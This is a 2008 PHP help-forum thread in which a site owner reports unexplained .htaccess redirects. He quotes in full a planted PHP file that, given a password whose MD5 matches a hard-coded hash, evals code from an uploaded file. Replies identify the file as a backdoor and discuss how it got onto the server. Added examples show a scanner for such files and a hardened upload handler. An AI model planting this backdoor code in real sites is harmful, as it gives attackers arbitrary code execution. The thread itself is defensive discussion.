mwstewart, Posted December 12, 2008

Hi all,

Sometimes when accessing my site I get redirected to an alternative site. I checked htaccess and it had a load of redirects in there that I didn't write. Permissions for it were 770.

I found the following in a php file (that I did not create):

```php
<?php
error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) { echo "$t\n"; };
function testdata($t) { say(md5("testdata_$t")); };
echo "<pre>";
testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3") {
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])) {
        eval($code);
    } else {
        testdata('f');
    };
} else {
    testdata('pass');
};
testdata('end');
echo "</pre>";
?>
```

Is a hacker trying to figure out how to exploit my site? How did someone have permission to create a file on my server? Is that possible because I have 'weak' code, despite file permissions preventing global write?

I have noticed that in the above php file, and the modified .htaccess, there is a lot of blank space around the code, which makes me think the modifications are the result of someone else's code.

Any advice here appreciated.

premiso, Posted December 12, 2008

Are you on a shared host? If so shared hosts are not secure at all and easily hacked.

Mchl, Posted December 12, 2008

Someone had to have access to your account. Either got your ftp credentials (username, password) or your host is cheating on you.

corbin, Posted December 12, 2008

That's essentially a backdoor. They can upload and run any script they want through that file. It probably got uploaded through a security flaw or something.

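An added example (not code from any poster in this thread): a PHP CLI scanner that flags files sharing the traits of the file quoted in the first post, and lists `.htaccess` redirects to absolute URLs for review. The trait list and function names are assumptions; a hit means "inspect this file", not proof of compromise.

```php
<?php
// Added example, not code from the thread. The trait list is an assumption
// modelled on the file quoted in the first post; extend it for your own site.
function backdoor_traits(string $source): array
{
    $traits = [];
    $code = '';
    // Tokenize so comments and inline HTML cannot hide or fake a match.
    foreach (token_get_all($source) as $tok) {
        if (!is_array($tok)) { $code .= $tok; continue; }
        if (in_array($tok[0], [T_COMMENT, T_DOC_COMMENT, T_INLINE_HTML], true)) continue;
        if ($tok[0] === T_EVAL) $traits['eval'] = 'calls eval()';
        $code .= $tok[1];
    }
    if (preg_match('/\$(HTTP_POST_FILES|_FILES)\b[^;]*tmp_name/', $code)) {
        $traits['upload'] = 'reads an uploaded temp file';
    }
    if (preg_match('/md5\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b[^)]*\)\s*===?\s*["\'][0-9a-f]{32}["\']/i', $code)) {
        $traits['gate'] = 'compares request input to a hard-coded MD5';
    }
    return array_values($traits);
}

function scan_tree(string $root): array
{
    $hits = [];
    $walker = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($walker as $file) {
        if (!$file->isFile()) continue;
        $path = $file->getPathname();
        if ($file->getFilename() === '.htaccess') {
            // List redirects to absolute URLs so they can be compared with what you wrote.
            $found = preg_grep('/^\s*(Redirect\w*|RewriteRule)\b.*https?:\/\//i', file($path) ?: []);
            if ($found) $hits[$path] = array_map('trim', array_values($found));
        } elseif (preg_match('/\.(php\d?|phtml)$/i', $path)) {
            $traits = backdoor_traits((string) file_get_contents($path));
            if ($traits) $hits[$path] = $traits;
        }
    }
    return $hits;
}

// Usage: php scan.php /path/to/webroot
if (PHP_SAPI === 'cli' && isset($argv[1])) {
    foreach (scan_tree($argv[1]) as $path => $findings) {
        echo $path, "\n  ", implode("\n  ", $findings), "\n";
    }
}
```
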
PFMaBiSmAd, Posted December 12, 2008

Two easy ways that someone can put a script on your server are if you have an upload form without validation of what was uploaded or where it is put or you are including a file where the name/url of that file is taken from a variable that comes from outside your script without validation of what or where that file name is.

darkfreaks, Posted December 12, 2008

Also a good idea to close the open connection with fclose(), otherwise anyone could overwrite the $code variable.

gevans, Posted December 12, 2008

@darkfreaks That's not his code, that's a back door that someone has uploaded to his server.

darkfreaks, Posted December 12, 2008

http://www.rubyrobot.org/article/protect-your-web-server-from-spambots

this is a nice way through PHP by banning IP's that attack with listed spam bots

Mchl, Posted December 12, 2008

IP banning is no good. I have like half the internet blocked because I use ISP with changing IPs.

premiso, Posted December 12, 2008

> http://www.rubyrobot.org/article/protect-your-web-server-from-spambots
>
> this is a nice way through PHP by banning IP's that attack with listed spam bots

That is for spambots...not people randomly hacking the site.

Mchl, Posted December 12, 2008

So what? Can't spambots run from the same IP range that I do?

darkfreaks, Posted December 12, 2008

there is always mod_rewrite

```apache
# disables HTTP TRACE
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]
```

don't know how far that would go to help

waynew, Posted December 13, 2008

Do you have an upload script, and if so... are you using is_uploaded_file( ) and checking for file types properly? (including checking the filename to see if the right extension exists?)

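An added example (not code from any poster in this thread) covering the two entry points PFMaBiSmAd names and the checks waynew asks about: an upload handler that validates what was uploaded and where it is put, and an include that is resolved from a fixed list. It assumes PHP 7+ with the fileinfo extension; the field layout, `UPLOAD_DIR`, the allow-list and the page names are illustrative assumptions.

```php
<?php
// Added example, not code from the thread. UPLOAD_DIR, ALLOWED and the page
// names are assumptions for illustration.
const UPLOAD_DIR = '/var/www/uploads-data';   // assumed: outside the document root
const ALLOWED = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

// $f is one entry of $_FILES, e.g. $_FILES['upload'].
function store_upload(array $f): string
{
    if (!isset($f['error'], $f['tmp_name'], $f['name']) || is_array($f['error'])
        || $f['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // The file must really have arrived through an HTTP POST upload.
    if (!is_uploaded_file($f['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // The extension of the client-supplied name must be on the allow-list ...
    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // ... and the type detected from the file's bytes must agree with it.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Never reuse the client's file name: generate one on the server, so a
    // name such as "x.php.jpg" or "../x.php" has no effect on the stored path.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($f['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

// Second case: an include whose name comes from outside the script.
// Look the value up in a fixed list instead of building a path or URL from it.
function page_file(string $requested): string
{
    $pages = ['home' => 'home.php', 'contact' => 'contact.php']; // assumed page names
    if (!isset($pages[$requested])) {
        throw new RuntimeException('unknown page');
    }
    return __DIR__ . '/pages/' . $pages[$requested];
}
```
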